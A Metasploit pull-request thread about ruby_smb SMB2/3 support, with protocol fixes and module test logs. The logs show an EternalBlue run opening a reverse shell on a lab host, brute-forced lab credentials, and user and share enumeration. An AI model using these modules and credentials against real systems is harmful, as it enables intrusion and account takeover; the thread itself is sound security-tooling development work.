  • Even fixing this, another issue in the write request will break this module. The Offset field of the WriteRequest is set to a random value in Rex::Proto::DCERPC::Client#write here. This is strictly prohibited by the protocol here (Offset field)

If the write is being executed on a pipe, the Offset MUST be set to 0 by the client and MUST be ignored by the server

Windows just ignores it, but Mac OS X follows the specs and fails with STATUS_INVALID_PARAMETER. This offset value is probably there as an evasion technique. I think we can remove this and have Mac OS X support again.

So, I will update these two things, unless someone is against it.


Regarding scanner/smb/smb_login, I couldn't reproduce the error you got:

msf5 auxiliary(scanner/smb/smb_login) > run

[*] 18.222.1.100:445     - 18.222.93.100:445 - Starting SMB login bruteforce
[+] 18.222.1.100:445     - 18.222.93.100:445 - Success: '.\smbtest:123456' Administrator
[*] Scanned 1 of 4 hosts (25% complete)
[*] 3.22.209.2:445      - 3.22.209.212:445 - Starting SMB login bruteforce
[+] 3.22.209.2:445      - 3.22.209.212:445 - Success: '.\smbtest:123456' Administrator
[*] Scanned 2 of 4 hosts (50% complete)
[*] 13.59.233.3:445     - 13.59.233.107:445 - Starting SMB login bruteforce
[+] 13.59.233.3:445     - 13.59.233.107:445 - Success: '.\smbtest:123456' Administrator
[*] Scanned 3 of 4 hosts (75% complete)
[*] 13.59.233.4:445      - 13.59.233.94:445 - Starting SMB login bruteforce
[+] 13.59.233.4:445      - 13.59.233.94:445 - Success: '.\smbtest:123456' Administrator
[*] Scanned 4 of 4 hosts (100% complete)
[*] Auxiliary module execution completed

When no domain is used (local user), it is substituted by a dot ('.'). According to the specs, the domain field cannot be empty.

Regarding scanner/smb/smb_version, it needs SMBv1 to work properly. The host you're testing probably has SMBv1 disabled.
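The two named-pipe rules from the comment above, as an added example that is not part of the PR, Metasploit or ruby_smb: it packs SMB2 CREATE and WRITE request bodies by hand (layouts from MS-SMB2 2.2.13 and 2.2.21) and flags the non-FILE_OPEN disposition and the non-zero Offset that the comment reports Mac OS X rejecting. The pipe name (srvsvc), access mask, FileId and payload bytes are constructed values.

```ruby
# Added example (not Metasploit's or ruby_smb's code): hand-packed SMB2 CREATE
# and WRITE request bodies for a named pipe, checked against the two MS-SMB2
# rules discussed in the thread. Layouts follow MS-SMB2 2.2.13 (CREATE Request)
# and 2.2.21 (WRITE Request), little-endian. Pipe name, access mask, FileId and
# payload bytes are constructed, not captured from a real session.

# CreateDisposition values 0..5 in spec order (MS-SMB2 2.2.13).
DISPOSITIONS = %w[FILE_SUPERSEDE FILE_OPEN FILE_CREATE FILE_OPEN_IF
                  FILE_OVERWRITE FILE_OVERWRITE_IF].freeze
FILE_OPEN    = DISPOSITIONS.index('FILE_OPEN')    # 1: fail unless it exists
FILE_OPEN_IF = DISPOSITIONS.index('FILE_OPEN_IF') # 3: open, else create

SMB2_HEADER_SIZE  = 64 # an SMB2 header precedes every request body
CREATE_FIXED_SIZE = 56 # CREATE request fields before the variable Buffer
WRITE_FIXED_SIZE  = 48 # WRITE request fields before the variable Buffer
CREATE_FMT = 'v C C V Q< Q< V V V V V v v V V'
WRITE_FMT  = 'v v V Q< a16 V V v v V'

# SMB2 CREATE request body opening +name+ (UTF-16LE on the wire).
def build_create_request(name, disposition)
  name_utf16 = name.encode('UTF-16LE').b
  [
    57,                                   # StructureSize (fixed at 57)
    0, 0,                                 # SecurityFlags, RequestedOplockLevel
    2,                                    # ImpersonationLevel: Impersonation
    0, 0,                                 # SmbCreateFlags, Reserved
    0x0012019f,                           # DesiredAccess (constructed read/write mask)
    0,                                    # FileAttributes
    7,                                    # ShareAccess: read | write | delete
    disposition,                          # CreateDisposition
    0,                                    # CreateOptions
    SMB2_HEADER_SIZE + CREATE_FIXED_SIZE, # NameOffset, relative to the SMB2 header
    name_utf16.bytesize,                  # NameLength
    0, 0                                  # CreateContextsOffset/Length: none
  ].pack(CREATE_FMT) + name_utf16
end

def parse_create_request(body)
  f = body.unpack(CREATE_FMT)
  raise ArgumentError, 'not an SMB2 CREATE request' unless f[0] == 57
  name = body.byteslice(CREATE_FIXED_SIZE, f[12]).force_encoding('UTF-16LE')
  { name: name.encode('UTF-8'), disposition: f[9] }
end

# SMB2 WRITE request body carrying +data+ at +offset+ on +file_id+.
def build_write_request(data, offset, file_id = "\x00".b * 16)
  [
    49,                                  # StructureSize (fixed at 49)
    SMB2_HEADER_SIZE + WRITE_FIXED_SIZE, # DataOffset
    data.bytesize,                       # Length
    offset,                              # Offset: the field the thread is about
    file_id,                             # FileId (16 bytes from the CREATE response)
    0, 0,                                # Channel, RemainingBytes
    0, 0,                                # WriteChannelInfoOffset/Length
    0                                    # Flags
  ].pack(WRITE_FMT) + data.b
end

def parse_write_request(body)
  f = body.unpack(WRITE_FMT)
  raise ArgumentError, 'not an SMB2 WRITE request' unless f[0] == 49
  { length: f[2], offset: f[3], file_id: f[4] }
end

# Check a CREATE/WRITE pair issued on +share+. Named pipes live on the IPC$
# tree, so the rules only apply there. Returns [[severity, message], ...].
def check_pipe_requests(share, create_body, write_body)
  findings = []
  return findings unless share.casecmp?('IPC$')

  c = parse_create_request(create_body)
  if c[:disposition] != FILE_OPEN
    # Spec-legal (servers MUST ignore the field for pipes), but the thread
    # reports macOS answering STATUS_ACCESS_DENIED unless it is FILE_OPEN.
    findings << [:warning, "CREATE #{c[:name]}: CreateDisposition " \
                           "#{DISPOSITIONS[c[:disposition]] || 'unknown'}; " \
                           'FILE_OPEN is the interoperable choice for a pipe']
  end

  w = parse_write_request(write_body)
  if w[:offset] != 0
    # MS-SMB2 2.2.21: on a pipe the client MUST set Offset to 0.
    findings << [:violation, "WRITE: Offset is #{w[:offset]}, MUST be 0 on a named pipe"]
  end
  findings
end

if __FILE__ == $PROGRAM_NAME
  # 0x1234_5678 stands in for the random offset the old DCERPC client sent.
  before_fix = check_pipe_requests('IPC$', build_create_request('srvsvc', FILE_OPEN_IF),
                                   build_write_request("\x05\x00", 0x1234_5678))
  after_fix  = check_pipe_requests('IPC$', build_create_request('srvsvc', FILE_OPEN),
                                   build_write_request("\x05\x00", 0))
  puts "before the fix: #{before_fix.inspect}"
  puts "after the fix:  #{after_fix.inspect}"
end
```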

- Update the SimpleClient#create_pipe permission from 'c' (FILE_OPEN_IF
  disposition: Open the file if it already exists; otherwise, create the file)
  to 'o' (FILE_OPEN disposition: If the file already exists, return success;
  otherwise, fail the operation).
- Remove the random offset in Rex::Proto::DCERPC::Client#write (evasion). This
  is strictly prohibited by the protocol and breaks on Mac OS X
@@ -136,7 +136,7 @@ Gem::Specification.new do |spec|
spec.add_runtime_dependency 'net-ssh'
spec.add_runtime_dependency 'ed25519' # Adds ed25519 keys for net-ssh
spec.add_runtime_dependency 'bcrypt_pbkdf'
spec.add_runtime_dependency 'ruby_smb', '~> 1.1'
spec.add_runtime_dependency 'ruby_smb', '~> 2.0'
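Review bot: the constraint bump from '~> 1.1' to '~> 2.0' needs a matching Gemfile.lock update in the same change, otherwise the lockfile still resolves a 1.x ruby_smb and the SMB2/SMB3 negotiation this PR relies on is never exercised; since '~> 2.0' also admits any later 2.x, the lockfile should pin the ruby_smb release that actually contains the required changes.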
Contributor

Does Gemfile.lock need to be updated too? 🤔

Contributor Author

Yes, absolutely. When this PR gets merged, we will release a new version of ruby_smb and I will update the gemspec file.

Contributor

Done! ruby_smb version 2.0.1 has been released and incorporates the referenced changes.

@cdelafuente-r7
Contributor Author

@bwatters-r7, @adfoster-r7, I pushed some ruby_smb updates here to address the issues you reported. Once it is merged, we will release a new version of ruby_smb and include it into MSF.

Thanks again for all the testing you've done!

@adfoster-r7
Contributor

OSX share enumeration works for me now 🎉

Just testing some additional SMB modules; everything seems pretty good to me

Windows testing

admin/smb/check_dir_file

Works as expected

set RHOSTS 10.10.10.172
set SMBUser SABatchJobs
set SMBPass SABatchJobs
set SMBSHARE users$
set RPATH mhope
msf5 auxiliary(admin/smb/check_dir_file) > options

Module options (auxiliary/admin/smb/check_dir_file):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS     10.10.10.172     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPATH      MEGABANK.LOCAL   yes       The name of the remote file/directory relative to the share
   RPORT      445              yes       The SMB service port (TCP)
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass    SABatchJobs      no        The password for the specified username
   SMBSHARE   SYSVOL           yes       The name of an accessible share on the server
   SMBUser    SABatchJobs      no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads (max one per host)

msf5 auxiliary(admin/smb/check_dir_file) > run

[*] 10.10.10.172:445      - Connecting to the server...
[*] 10.10.10.172:445      - Mounting the remote share \\10.10.10.172\SYSVOL'...
[*] 10.10.10.172:445      - Checking for file/folder MEGABANK.LOCAL...
[+] 10.10.10.172:445      - Directory FOUND: \\10.10.10.172\SYSVOL\MEGABANK.LOCAL
[*] 10.10.10.172:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Log:

[06/17/2020 13:36:43] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/17/2020 13:36:43] [d(0)] core: Negotiated SMB version: SMB3

admin/smb/download_file

With a folder

set RHOSTS 10.10.10.172
set SMBUser SABatchJobs
set SMBPass SABatchJobs
set SMBSHARE users$
set RPATH mhope

Correctly handling error scenario:

[*] 10.10.10.172:445      - Connecting...
[*] 10.10.10.172:445      - 10.10.10.172:445     : Mounting the remote share \\10.10.10.172\users$'...
[*] 10.10.10.172:445      - Trying to download mhope...
[*] 10.10.10.172:445      - Error: 10.10.10.172: RubySMB::Error::UnexpectedStatusCode The server responded with an unexpected status code: STATUS_FILE_IS_A_DIRECTORY
[*] 10.10.10.172:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Correctly handled error logs:

[06/17/2020 13:38:53] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/17/2020 13:38:54] [d(0)] core: Negotiated SMB version: SMB3
[06/17/2020 13:38:54] [e(0)] core: Error running against host 10.10.10.172: The server responded with an unexpected status code: STATUS_FILE_IS_A_DIRECTORY
/Users/adfoster/.rvm/gems/ruby-2.6.6@metasploit-framework/bundler/gems/ruby_smb-183d47aae4c4/lib/ruby_smb/smb2/tree.rb:116:in `open_file'
/Users/adfoster/.rvm/gems/ruby-2.6.6@metasploit-framework/bundler/gems/ruby_smb-183d47aae4c4/lib/ruby_smb/client/utils.rb:28:in `open'
/Users/adfoster/Documents/code/metasploit-framework/lib/rex/proto/smb/simpleclient.rb:216:in `open'
/Users/adfoster/Documents/code/metasploit-framework/modules/auxiliary/admin/smb/download_file.rb:48:in `block in smb_download'
/Users/adfoster/Documents/code/metasploit-framework/modules/auxiliary/admin/smb/download_file.rb:43:in `each'
/Users/adfoster/Documents/code/metasploit-framework/modules/auxiliary/admin/smb/download_file.rb:43:in `smb_download'
/Users/adfoster/Documents/code/metasploit-framework/modules/auxiliary/admin/smb/download_file.rb:67:in `run_host'
/Users/adfoster/Documents/code/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:117:in `block (2 levels) in run'
/Users/adfoster/Documents/code/metasploit-framework/lib/msf/core/thread_manager.rb:106:in `block in spawn'

With a file

Setting a real file:

set RHOSTS 10.10.10.172
set SMBUser SABatchJobs
set SMBPass SABatchJobs
set SMBSHARE users$
set RPATH "mhope\azure.xml"
msf5 auxiliary(admin/smb/download_file) > run

[*] 10.10.10.172:445      - Connecting...
[*] 10.10.10.172:445      - 10.10.10.172:445     : Mounting the remote share \\10.10.10.172\users$'...
[*] 10.10.10.172:445      - Trying to download mhope\azure.xml...
[+] 10.10.10.172:445      - mhope\azure.xml saved as: /Users/adfoster/.msf4/loot/20200617134007_default_10.10.10.172_smb.shares.file_360440.xml
[*] 10.10.10.172:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Log:

[06/17/2020 13:40:06] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/17/2020 13:40:06] [d(0)] core: Negotiated SMB version: SMB3

modules/auxiliary/admin/smb/list_directory

This module seems to fail due to needing SMB1 support?

set RHOSTS 10.10.10.172
set SMBUser SABatchJobs
set SMBPass SABatchJobs
set SMBSHARE users$
msf5 auxiliary(admin/smb/list_directory) > run
[*] Running module against 10.10.10.172

[*] 10.10.10.172:445 - Connecting to the server...
[-] 10.10.10.172:445 - Login Failed: Connection reset by peer
[*] Auxiliary module execution completed
[06/17/2020 13:50:07] [d(0)] core: SMB version(s) to negotiate: [1]

@@ -55,7 +56,7 @@ def as_size( s )
def run
print_status("Connecting to the server...")
begin
connect()
connect(versions: [1])
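Review bot: the connect(versions: [1]) call in run should carry an inline comment explaining that SMB1 is forced because the module relies on calls only implemented in the Rex SMB client (find_first) and parses the raw Rex response; without it a later reader will see a hard-coded protocol downgrade and revert it. The module should also tell the user up front that it requires SMBv1 on the target, since the run above fails with only 'Login Failed: Connection reset by peer' when SMBv1 is disabled.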
Contributor

@adfoster-r7 adfoster-r7 Jun 17, 2020

Just for context; Why do we need to change this to version 1 here?

Contributor Author

This module uses a method that is only implemented in the Rex SMB client (find_first). It also extracts information from the raw Rex response. Forcing to version 1 will ensure it will use Rex SMB client and not RubySMB client.
This module will need to be redesigned to be able to use RubySMB by default (like many others). This will be taken care of, in the next iteration of this project.

@adfoster-r7
Contributor

I don't think it's a concern for this PR, but just as visibility I also tested this out with impacket's smb server and I wasn't able to connect successfully.

git clone https://github.com/SecureAuthCorp/impacket.git

After spinning up the server:

sudo pipenv run python examples/smbserver.py -debug -username test -password test test_share $(PWD)

I confirmed connecting with impacket’s client just fine:

$ pipenv run python examples/smbclient.py test:test@127.0.0.1
Impacket v0.9.22.dev1+20200607.100119.b5c61678 - Copyright 2020 SecureAuth Corporation
Type help for list of commands
# shares
IPC$
TEST_SHARE
# use TEST_SHARE
# ls
drw-rw-rw-        576  Wed Jun 10 20:14:23 2020 .
drw-rw-rw-       2048  Tue Jun 16 13:24:07 2020 ..
drw-rw-rw-       1440  Wed Jun 10 20:12:19 2020 impacket
-rw-rw-rw-       3550  Wed Jun 10 20:12:19 2020 LICENSE
-rw-rw-rw-        123  Wed Jun 10 20:12:19 2020 requirements.txt
-rw-rw-rw-      12399  Wed Jun 10 20:12:19 2020 ChangeLog
drw-rw-rw-        288  Wed Jun 10 20:12:19 2020 tests
-rw-rw-rw-        165  Wed Jun 10 20:12:19 2020 MANIFEST.in
-rw-rw-rw-       4101  Wed Jun 10 20:12:19 2020 README.md
-rw-rw-rw-        304  Wed Jun 10 20:13:14 2020 Pipfile
-rw-rw-rw-       2810  Wed Jun 10 20:12:19 2020 setup.py
-rw-rw-rw-        798  Wed Jun 10 20:12:19 2020 .gitignore
drw-rw-rw-       1664  Wed Jun 10 20:12:19 2020 examples
drw-rw-rw-         96  Wed Jun 10 20:12:19 2020 .github
-rw-rw-rw-        426  Wed Jun 10 20:12:19 2020 tox.ini
drw-rw-rw-        384  Wed Jun 17 10:58:16 2020 .git
-rw-rw-rw-        716  Wed Jun 10 20:12:19 2020 .travis.yml
-rw-rw-rw-      14836  Wed Jun 10 20:14:23 2020 Pipfile.lock

But msfconsole’s enum shares doesn’t work:

msf5 auxiliary(scanner/smb/smb_enumshares) > run
[-] 127.0.0.1:139         - Error: '127.0.0.1' 'Rex::ConnectionRefused' 'The connection was refused by the remote host (127.0.0.1:139).'
[-] 127.0.0.1:445         - Login Failed: incomplete "." on UTF-16LE
[*] 127.0.0.1:            - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

I can’t immediately tell if that’s a problem with msfconsole or impacket server - I didn't look any further, but just posting for visibility 👍

@adfoster-r7

I was trying to download a file from a share with a ’ in the share name, which gave me encoding issues. I imagine the problem exists with file names too.

Options:

msf5 auxiliary(admin/smb/download_file) > options

Module options (auxiliary/admin/smb/download_file):

   Name         Current Setting                  Required  Description
   ----         ---------------                  --------  -----------
   FILE_RPATHS                                   no        A file containing a list remote files relative to the share to operate on
   RHOSTS       127.0.0.1                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPATH        testing/hello_world.txt          no        The name of the remote file relative to the share to operate on
   RPORT        445                              yes       The SMB service port (TCP)
   SMBDomain    .                                no        The Windows domain to use for authentication
   SMBPass      test                             no        The password for the specified username
   SMBSHARE     Administrator’s Public Folder    yes       The name of a share on the RHOST
   SMBUser      test                             no        The username to authenticate as
   THREADS      1                                yes       The number of concurrent threads (max one per host)

Result:

msf5 auxiliary(admin/smb/download_file) > run

[*] 127.0.0.1:445         - Connecting...
[*] 127.0.0.1:445         - 127.0.0.1:445        : Mounting the remote share \\127.0.0.1\Administrator’s Public Folder'...
[*] 127.0.0.1:445         - Error: 127.0.0.1: Encoding::UndefinedConversionError "\xE2" to UTF-8 in conversion from ASCII-8BIT to UTF-8 to UTF-16LE
[*] 127.0.0.1:445         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Backtrace
==> /Users/adfoster/.msf4/logs/framework.log <==
[06/17/2020 16:42:15] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/17/2020 16:42:15] [d(0)] core: Negotiated SMB version: SMB3
[06/17/2020 16:42:15] [e(0)] core: Error running against host 127.0.0.1: "\xE2" to UTF-8 in conversion from ASCII-8BIT to UTF-8 to UTF-16LE
/Users/adfoster/.rvm/gems/ruby-2.6.6@metasploit-framework/bundler/gems/ruby_smb-183d47aae4c4/lib/ruby_smb/field/string16.rb:6:in `encode'
/Users/adfoster/.rvm/gems/ruby-2.6.6@metasploit-framework/bundler/gems/ruby_smb-183d47aae4c4/lib/ruby_smb/field/string16.rb:6:in `assign'
/Users/adfoster/.rvm/gems/ruby-2.6.6@metasploit-framework/gems/bindata-2.4.7/lib/bindata/struct.rb:190:in `block in define_field_accessors_for'
/Users/adfoster/.rvm/gems/ruby-2.6.6@metasploit-framework/bundler/gems/ruby_smb-183d47aae4c4/lib/ruby_smb/client/tree_connect.rb:58:in `smb2_tree_connect'
/Users/adfoster/.rvm/gems/ruby-2.6.6@metasploit-framework/bundler/gems/ruby_smb-183d47aae4c4/lib/ruby_smb/client.rb:509:in `tree_connect'
/Users/adfoster/Documents/code/metasploit-framework/lib/rex/proto/smb/simpleclient.rb:176:in `connect'
/Users/adfoster/Documents/code/metasploit-framework/modules/auxiliary/admin/smb/download_file.rb:41:in `smb_download'
/Users/adfoster/Documents/code/metasploit-framework/modules/auxiliary/admin/smb/download_file.rb:67:in `run_host'
/Users/adfoster/Documents/code/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:117:in `block (2 levels) in run'
/Users/adfoster/Documents/code/metasploit-framework/lib/msf/core/thread_manager.rb:106:in `block in spawn'

@adfoster-r7

Windows 7 testing

Testing SMB v1 + v2 on windows 7 target

| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Jon-PC
|   NetBIOS computer name: JON-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-06-18T06:21:16-05:00

From tryhackme's blue box

set RHOST 10.10.62.226
set SMBUser Jon
set SMBPass alqfna22

Pass

exploit/windows/smb/ms17_010_eternalblue

After a couple of fails, eventually a win:

msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.11.12.2:4444 
[*] 10.10.62.226:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[*] 10.10.62.226:445      - Connected to \\10.10.62.226\IPC$ with TID = 2048
[*] 10.10.62.226:445      - Received STATUS_INSUFF_SERVER_RESOURCES with FID = 0
[+] 10.10.62.226:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.62.226:445      - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.62.226:445 - Connecting to target for exploitation.
[+] 10.10.62.226:445 - Connection established for exploitation.
[+] 10.10.62.226:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.62.226:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.62.226:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.62.226:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.62.226:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.62.226:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.62.226:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.62.226:445 - Sending all but last fragment of exploit packet
[*] 10.10.62.226:445 - Sending NT Trans Request packet
[*] 10.10.62.226:445 - Making :eb_trans2_zero packet
[*] 10.10.62.226:445 - Making :eb_trans2_buffer packet
[*] 10.10.62.226:445 - Making :eb_trans2_buffer packet
[*] 10.10.62.226:445 - Making :eb_trans2_buffer packet
[*] 10.10.62.226:445 - Making :eb_trans2_buffer packet
[*] 10.10.62.226:445 - Making :eb_trans2_buffer packet
[*] 10.10.62.226:445 - Making :eb_trans2_buffer packet
[*] 10.10.62.226:445 - Making :eb_trans2_buffer packet
[*] 10.10.62.226:445 - Making :eb_trans2_buffer packet
[*] 10.10.62.226:445 - Making :eb_trans2_buffer packet
[*] 10.10.62.226:445 - Making :eb_trans2_buffer packet
[*] 10.10.62.226:445 - Making :eb_trans2_buffer packet
[*] 10.10.62.226:445 - Making :eb_trans2_buffer packet
[*] 10.10.62.226:445 - Making :eb_trans2_buffer packet
[*] 10.10.62.226:445 - Making :eb_trans2_buffer packet
[*] 10.10.62.226:445 - Sending malformed Trans2 packets
[*] 10.10.62.226:445 - Starting non-paged pool grooming
[*] 10.10.62.226:445 - Sending start free hole packet.
[+] 10.10.62.226:445 - Sending SMBv2 buffers
[*] 10.10.62.226:445 - Sending end free hole packet.
[+] 10.10.62.226:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.62.226:445 - Sending final SMBv2 buffers.
[*] 10.10.62.226:445 - Sending last fragment of exploit packet!
[*] 10.10.62.226:445 - Making :eb_trans2_exploit packet
[*] 10.10.62.226:445 - Receiving response from exploit packet
[+] 10.10.62.226:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.62.226:445 - Sending egg to corrupted connection.
[*] 10.10.62.226:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (10.11.12.2:4444 -> 10.10.62.226:49190) at 2020-06-18 12:30:44 +0100
[+] 10.10.62.226:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.62.226:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.62.226:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

scanner/smb/smb_enumusers

msf5 auxiliary(scanner/smb/smb_enumusers) > run

[+] 10.10.62.226:445      - JON-PC [ Administrator, Guest, Jon ] ( LockoutTries=0 PasswordMin=0 )
[*] 10.10.62.226:         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

scanner/smb/smb_enumshares

msf5 auxiliary(scanner/smb/smb_enumshares) > run

[-] 10.10.62.226:139      - Login Failed: Unable to negotiate SMB1 with the remote host: Not a valid SMB packet
[!] 10.10.62.226:445      - peer_native_os is only available with SMB1 (current version: SMB2)
[!] 10.10.62.226:445      - peer_native_lm is only available with SMB1 (current version: SMB2)
[+] 10.10.62.226:445      - ADMIN$ - (DISK) Remote Admin
[+] 10.10.62.226:445      - C$ - (DISK) Default share
[+] 10.10.62.226:445      - IPC$ - (IPC) Remote IPC
[*] 10.10.62.226:         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

scanner/smb/smb_ms17_010

Success

msf5 auxiliary(scanner/smb/smb_ms17_010) > run

[*] 10.10.62.226:445      - Connected to \\10.10.62.226\IPC$ with TID = 2048
[*] 10.10.62.226:445      - Received STATUS_INSUFF_SERVER_RESOURCES with FID = 0
[+] 10.10.62.226:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.62.226:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

auxiliary/scanner/smb/smb_login

msf5 auxiliary(scanner/smb/smb_login) > run

[*] 10.10.62.226:445      - 10.10.62.226:445 - Starting SMB login bruteforce
[+] 10.10.62.226:445      - 10.10.62.226:445 - Success: '.\Jon:alqfna22'
[*] 10.10.62.226:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Fail

scanner/smb/smb_enumusers_domain

Failed

msf5 auxiliary(scanner/smb/smb_enumusers_domain) > run

Login Failed: Unable to negotiate SMB1 with the remote host: Not a valid SMB packet
[*] 10.10.62.226:         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

scanner/smb/smb_enum_gpp

Failed

msf5 auxiliary(scanner/smb/smb_enum_gpp) > run

[*] 10.10.62.226:445      - Connecting to the server...
[*] 10.10.62.226:445      - Mounting the remote share \\10.10.62.226\SYSVOL'...
[-] 10.10.62.226:445      - 10.10.62.226: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_BAD_NETWORK_NAME (Command=117 WordCount=0)
[*] 10.10.62.226:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

@cdelafuente-r7

I don't think it's a concern for this PR, but just as visibility I also tested this out with impacket's smb server and I wasn't able to connect successfully.

I ran some tests and found out that the Net::Client::NTLM library we are using is not dealing very well with OEM encoding. This does not cause any issue with Windows/Mac/Samba etc. since they all require Unicode, which is the default (they don't even advertise OEM support anymore). However, impacket seems to take the encoding requirements from the client request and copy them into the response it sends back. As a consequence, Net::Client::NTLM feels like it would be better to use OEM encoding instead of Unicode, and fails.
I updated the RubySMB library to force Net::Client::NTLM to only require Unicode.

However, this is not enough to have it working with impacket. This time, it looks like an impacket issue: it does not add the NtCreateAndxResponse extended information even if the client requires it. [MS-SMB] added this extension to the original CIFS protocol and it is the default now. This makes RubySMB fail when parsing the response, since it expects the extended information.

We can still update RubySMB to accept this and parse the response even if the extended information is missing. But I'm wondering if it is worth the effort, since the issue looks to be on the impacket side.

@cdelafuente-r7

I was trying to download a file from a share with a ’ in the share name, which gave me encoding issues. I imagine the problem exists with file names too.

I couldn't reproduce the issue with a share name containing a quote. However, I checked the single quote from your comment and it is actually a weirdly encoded character: "\xE2\x80\x99". Did you copy/paste this share name directly into msfconsole? Can you please try again, typing the share name, and see if you still have the issue?

@adfoster-r7

@cdelafuente-r7 OSX has a habit of using ’ over '. I think the underlying issue is string encoding, but I'll double check that too.

@cdelafuente-r7

cdelafuente-r7 commented Jun 18, 2020

@adfoster-r7, thanks again for testing.

Regarding the failed tests against Windows 7:

scanner/smb/smb_enumusers_domain

Failed

msf5 auxiliary(scanner/smb/smb_enumusers_domain) > run

Login Failed: Unable to negotiate SMB1 with the remote host: Not a valid SMB packet
[*] 10.10.62.226:         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

This module seems to work when testing against 445/TCP. The error message is related to the first try against 139/TCP (NetBIOS). The module does not set SimpleClient.direct to false, which disables the NetBIOS session creation, and fails.
I got it working on 139/TCP by disabling SMBDirect and setting the correct NetBIOS name:

msf5 auxiliary(scanner/smb/smb_enumusers_domain) > run

Login Failed: Unable to negotiate SMB1 with the remote host: Not a valid SMB packet
[*] 172.16.60.134:445     - WIN7-DEV\nutmeg	(logon_server: WIN7-DEV, other_domains: )
[*] 172.16.60.134:445     - WIN7-DEV\nutmeg	(logon_server: WIN7-DEV, other_domains: )
[+] 172.16.60.134:445     - Found user: WIN7-DEV\nutmeg
[*] 172.16.60.134:        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_enumusers_domain) > set SMBDirect false
SMBDirect => false
msf5 auxiliary(scanner/smb/smb_enumusers_domain) > set SMBName Win7-dev
SMBName => Win7-dev
msf5 auxiliary(scanner/smb/smb_enumusers_domain) > run

[*] 172.16.60.134:139     - WIN7-DEV\nutmeg	(logon_server: WIN7-DEV, other_domains: )
[*] 172.16.60.134:139     - WIN7-DEV\nutmeg	(logon_server: WIN7-DEV, other_domains: )
[+] 172.16.60.134:139     - Found user: WIN7-DEV\nutmeg
[*] 172.16.60.134:        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

scanner/smb/smb_enum_gpp

Failed

msf5 auxiliary(scanner/smb/smb_enum_gpp) > run

[*] 10.10.62.226:445      - Connecting to the server...
[*] 10.10.62.226:445      - Mounting the remote share \\10.10.62.226\SYSVOL'...
[-] 10.10.62.226:445      - 10.10.62.226: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_BAD_NETWORK_NAME (Command=117 WordCount=0)
[*] 10.10.62.226:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

This module is set to use Rex SMB client only. This error shows that the SYSVOL share does not exist on this target.

All these old modules will need to be redesigned/refactored to be able to use RubySMB by default.

@cdelafuente-r7

@cdelafuente-r7 OSX has a habit of using ’ over '. I think the underlying issue is string encoding, but I'll double check that too.

That's interesting, I got different results if I run a Pry session directly or within MSF:

$ pry
[1] pry(main)> require 'ruby_smb'
=> true
[2] pry(main)> RubySMB::Field::String16.new('’')
=> "\u2019"
msf5 auxiliary(scanner/smb/smb_enum_gpp) > pry
[*] Starting Pry shell...
[*] You are in auxiliary/scanner/smb/smb_enum_gpp

